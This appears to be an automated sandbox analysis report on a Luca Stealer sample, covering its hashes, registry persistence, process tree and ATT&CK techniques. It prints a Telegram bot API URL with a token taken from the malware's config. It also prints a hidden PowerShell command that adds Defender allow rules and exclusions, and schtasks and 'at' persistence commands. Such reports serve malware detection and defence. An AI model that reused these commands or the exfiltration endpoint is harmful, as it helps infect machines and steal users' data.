Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
05-07-2024 22:26
Static task
static1
Behavioral task
behavioral1
Sample
65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
Resource
win10v2004-20240704-en
General
-
Target
65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
-
Size
4.5MB
-
MD5
b07543ce10033160a338e01933cb8b86
-
SHA1
30b8d4fd6864e3a056c1d57320efff1bb89c2228
-
SHA256
65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0
-
SHA512
26389076fddf72f5318065b2f6112a7973b059a449160cf974adf3ff3b883a3f2dd154eb472c0b02d6b2ddd9f0f76799bfebc969944fe9ae678fb849c32dd716
-
SSDEEP
98304:zXtrbTA1+sVDTXLW6jRhdGVQguhhW31ZO:z9c1+0zL5LdGVzu+lE
Malware Config
Extracted
lucastealer
https://api.telegram.org/bot6068798932:AAG_cHiqinDwNZ3Hd-rdp8tPwbT0czdVwTw
Signatures
-
Luca Stealer
Info stealer written in Rust first seen in July 2022.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe" svchost.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 8 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR" svchost.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} svchost.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR" explorer.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR" svchost.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} svchost.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} svchost.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1008 powershell.exe 1008 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PWNHLD.lnk 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe -
Executes dropped EXE 9 IoCs
pid Process 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2464 icsys.icn.exe 2104 explorer.exe 2784 spoolsv.exe 2820 UVLZVA.exe 2000 svchost.exe 1668 uvlzva.exe 2772 icsys.icn.exe 736 spoolsv.exe -
Loads dropped DLL 19 IoCs
pid Process 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2464 icsys.icn.exe 2464 icsys.icn.exe 2104 explorer.exe 2104 explorer.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2784 spoolsv.exe 2784 spoolsv.exe 2820 UVLZVA.exe 2820 UVLZVA.exe 2820 UVLZVA.exe 2000 svchost.exe 2000 svchost.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\PWNHLD = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\Microsoft Office Click-to-Run.exe\"" 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000015e87-6.dat autoit_exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification \??\c:\windows\system\explorer.exe icsys.icn.exe File opened for modification \??\c:\windows\system\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\system\svchost.exe spoolsv.exe File opened for modification \??\c:\windows\system\explorer.exe explorer.exe File opened for modification \??\c:\windows\system\svchost.exe svchost.exe File opened for modification C:\Windows\system\udsys.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2604 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2464 icsys.icn.exe 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 1008 powershell.exe 2104 explorer.exe 2104 explorer.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe 2104 explorer.exe 2000 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2104 explorer.exe 2000 svchost.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1008 powershell.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 2464 icsys.icn.exe 2464 icsys.icn.exe 2104 explorer.exe 2104 explorer.exe 2784 spoolsv.exe 2784 spoolsv.exe 2000 svchost.exe 2820 UVLZVA.exe 2820 UVLZVA.exe 2772 icsys.icn.exe 2772 icsys.icn.exe 2000 svchost.exe 736 spoolsv.exe 736 spoolsv.exe 2104 explorer.exe 2104 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1220 wrote to memory of 2932 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 30 PID 1220 wrote to memory of 2932 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 30 PID 1220 wrote to memory of 2932 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 30 PID 1220 wrote to memory of 2932 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 30 PID 1220 wrote to memory of 2464 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 31 PID 1220 wrote to memory of 2464 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 31 PID 1220 wrote to memory of 2464 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 31 PID 1220 wrote to memory of 2464 1220 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 31 PID 2464 wrote to memory of 2104 2464 icsys.icn.exe 32 PID 2464 wrote to memory of 2104 2464 icsys.icn.exe 32 PID 2464 wrote to memory of 2104 2464 icsys.icn.exe 32 PID 2464 wrote to memory of 2104 2464 icsys.icn.exe 32 PID 2104 wrote to memory of 2784 2104 explorer.exe 33 PID 2104 wrote to memory of 2784 2104 explorer.exe 33 PID 2104 wrote to memory of 2784 2104 explorer.exe 33 PID 2104 wrote to memory of 2784 2104 explorer.exe 33 PID 2932 wrote to memory of 2820 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 34 PID 2932 wrote to memory of 2820 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 34 PID 2932 wrote to memory of 2820 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 34 PID 2932 wrote to memory of 2820 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 34 PID 2932 wrote to memory of 2552 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 35 PID 2932 wrote to memory of 2552 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 35 PID 2932 wrote to memory of 2552 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 35 PID 2932 wrote to memory of 2552 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 35 PID 2784 wrote to memory of 2000 2784 spoolsv.exe 37 PID 2784 wrote to memory of 2000 2784 spoolsv.exe 37 PID 2784 wrote to memory of 2000 2784 spoolsv.exe 37 PID 2784 wrote to memory of 2000 2784 spoolsv.exe 37 PID 2552 wrote to memory of 756 2552 cmd.exe 38 PID 2552 wrote to memory of 756 2552 cmd.exe 38 PID 2552 wrote to memory of 756 2552 cmd.exe 38 PID 2552 wrote to memory of 756 2552 cmd.exe 38 PID 2820 wrote to memory of 1668 2820 UVLZVA.exe 40 PID 2820 wrote to memory of 1668 2820 UVLZVA.exe 40 PID 2820 wrote to memory of 1668 2820 UVLZVA.exe 40 PID 2820 wrote to memory of 1668 2820 UVLZVA.exe 40 PID 2552 wrote to memory of 1008 2552 cmd.exe 39 PID 2552 wrote to memory of 1008 2552 cmd.exe 39 PID 2552 wrote to memory of 1008 2552 cmd.exe 39 PID 2552 wrote to memory of 1008 2552 cmd.exe 39 PID 2552 wrote to memory of 2272 2552 cmd.exe 41 PID 2552 wrote to memory of 2272 2552 cmd.exe 41 PID 2552 wrote to memory of 2272 2552 cmd.exe 41 PID 2552 wrote to memory of 2272 2552 cmd.exe 41 PID 2820 wrote to memory of 2772 2820 UVLZVA.exe 44 PID 2820 wrote to memory of 2772 2820 UVLZVA.exe 44 PID 2820 wrote to memory of 2772 2820 UVLZVA.exe 44 PID 2820 wrote to memory of 2772 2820 UVLZVA.exe 44 PID 2932 wrote to memory of 2356 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 45 PID 2932 wrote to memory of 2356 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 45 PID 2932 wrote to memory of 2356 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 45 PID 2932 wrote to memory of 2356 2932 65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe 45 PID 2356 wrote to memory of 2604 2356 cmd.exe 47 PID 2356 wrote to memory of 2604 2356 cmd.exe 47 PID 2356 wrote to memory of 2604 2356 cmd.exe 47 PID 2356 wrote to memory of 2604 2356 cmd.exe 47 PID 2000 wrote to memory of 736 2000 svchost.exe 49 PID 2000 wrote to memory of 736 2000 svchost.exe 49 PID 2000 wrote to memory of 736 2000 svchost.exe 49 PID 2000 wrote to memory of 736 2000 svchost.exe 49 PID 2000 wrote to memory of 1688 2000 svchost.exe 50 PID 2000 wrote to memory of 1688 2000 svchost.exe 50 PID 2000 wrote to memory of 1688 2000 svchost.exe 50 PID 2000 wrote to memory of 1688 2000 svchost.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe"C:\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1220 -
\??\c:\users\admin\appdata\local\temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exec:\users\admin\appdata\local\temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\UVLZVA.exe"C:\Users\Admin\AppData\Local\Temp\UVLZVA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2820 -
\??\c:\users\admin\appdata\local\temp\uvlzva.exec:\users\admin\appdata\local\temp\uvlzva.exe4⤵
- Executes dropped EXE
PID:1668
-
-
C:\Users\Admin\AppData\Local\icsys.icn.exeC:\Users\Admin\AppData\Local\icsys.icn.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\BVSURZ.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\reg.exereg query "HKU\S-1-5-19\Environment"4⤵PID:756
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\SysWOW64\reg.exereg query "HKU\S-1-5-19\Environment"4⤵PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn PWNHLD.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 13⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn PWNHLD.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 14⤵
- Scheduled Task/Job: Scheduled Task
PID:2604
-
-
-
-
C:\Users\Admin\AppData\Local\icsys.icn.exeC:\Users\Admin\AppData\Local\icsys.icn.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464 -
\??\c:\windows\system\explorer.exec:\windows\system\explorer.exe3⤵
- Modifies WinLogon for persistence
- Modifies visiblity of hidden/system files in Explorer
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2104 -
\??\c:\windows\system\spoolsv.exec:\windows\system\spoolsv.exe SE4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784 -
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe5⤵
- Modifies WinLogon for persistence
- Modifies visiblity of hidden/system files in Explorer
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2000 -
\??\c:\windows\system\spoolsv.exec:\windows\system\spoolsv.exe PR6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:736
-
-
C:\Windows\SysWOW64\at.exeat 22:28 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe6⤵PID:1688
-
-
C:\Windows\SysWOW64\at.exeat 22:29 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe6⤵PID:2080
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe6⤵PID:2856
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD515a1fe3d0f342bdd3232253c7810a05d
SHA1b658e0d903b37bf12e8e640bece22f235552dc50
SHA2564070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338
SHA5121961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35
-
Filesize
5.7MB
MD52c2055233260e5bb20ce675afd39ed0d
SHA126c056ba8e99a3fb523612b422a85be3ecbbd5b3
SHA256306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d
SHA5123e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546
-
Filesize
206KB
MD5299e066e83bcdd17eeb971a43d6fb73c
SHA1b05f656ab74d3d716a932f733d294f6a65148aca
SHA256f4f3d32b28fe4933016db35869216c344dbe76d5dd5b532917a12a27f862b7fa
SHA51243bbbadc2b47f5ffeed4abd40fb1dee1af21118f7a9c7540cd8427f506326c30a94d5ac31208286613d20c553c714b9d70ef0401be44cc9529dda7e40431b8b3
-
\Users\Admin\AppData\Local\Temp\65b159164f936a8f15e1673cb6e5b7c0c87707fc2524b746c8f049949ccd1bf0.exe
Filesize4.3MB
MD51c548cff5a0fbce841e13c9f788793d0
SHA155c2d9f23a5cea3ae4b8f629f968369b171d1af8
SHA256a75a3cc0efa0b8015ce6ad54c3b55783dcbea82507aafcd0dcb0302c6e66d61e
SHA512332dff21acd741f7b64f104a4f8d20fb5a52ee3fba6b3b2f1080ab4a97523e264f252c0310ae71600295b3f604379c8887640132c3372f7751a67c8ac9ba6f36
-
Filesize
5.9MB
MD5021079dc0918b9c7359e93e770678000
SHA170c03da6f7b339340b1943f5d0b7b1fd87579adf
SHA256ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487
SHA5129bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0
-
Filesize
207KB
MD548a26cf1587666ce901401c65575a7bd
SHA1416738612e20c2b245d6c410def49f8bd2478c86
SHA256c5aba06a9ed1291191b9888ad75a51048f5eba7e56387182325653e37bea0945
SHA512f15639ef35b6e95dea6096c8abf81db55528ca7246d168c1694af284090f839fd3431d9b97887e78d754bcb3a81f8fe613a14c8e5b3e95edfd3dc5b5b076a7cb
-
Filesize
206KB
MD571acc17d00bac4a3103092d525f5a10a
SHA10f9036f9f318ab0a8708e7b373f81193964b00f2
SHA25673b1078d16ef80645e7641df5d7f24311e7eef11a6293f1e214656e409aad99d
SHA5129389161325037984853364ca3b3e020ea912f007d3495a77b358b8dd85b3db78d7f24db45e8d847dff8f20b0427888485c3fc393ff2e548057256a06bae346b5
-
Filesize
206KB
MD527bba08c021bc8d8fcaf558bd6e6b2d5
SHA1a3bd0821cc3e48476fd8033431991f536146157d
SHA256a44882b225e96944c7ce8c208293f8984b9ac9cb72bf71929f0103a5faff9f79
SHA51289d6711fa0cac5d085f59d57ae66bfdf09bf13b0be35a19be3d2f220a05e740ea0b2e47402e2b540b95cf3763d9e94270b8dd7cb1fb7a6c04e048caae67a8db7
-
Filesize
206KB
MD50c3f480898f067a858a2261f39011fe4
SHA1080a52bbb32dbeb0a688462661b5c8f90d277bfe
SHA256304606eedffc7f52ef5d3c900de6bacac9d3831d975b2ef281ea63f0f2f13a94
SHA51262ebe1618a9b2675fade41962c4dd66be7db21602e760ea1d7f277f36fa26f00f07846c8dfba07712c9bf0cc85723cc4664d11d884e81d225e53ad2946a028cc